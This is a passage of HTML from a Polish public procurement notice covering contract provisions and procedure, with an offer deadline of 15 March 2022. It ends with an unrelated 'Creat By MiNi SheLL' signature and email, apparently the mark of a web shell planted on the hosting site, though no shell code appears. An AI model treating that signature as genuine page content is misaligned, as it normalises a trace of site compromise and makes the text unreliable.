wykluczenia z postępowania <br/> składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Składanie ofert poprzez Platformę e-zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-15 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com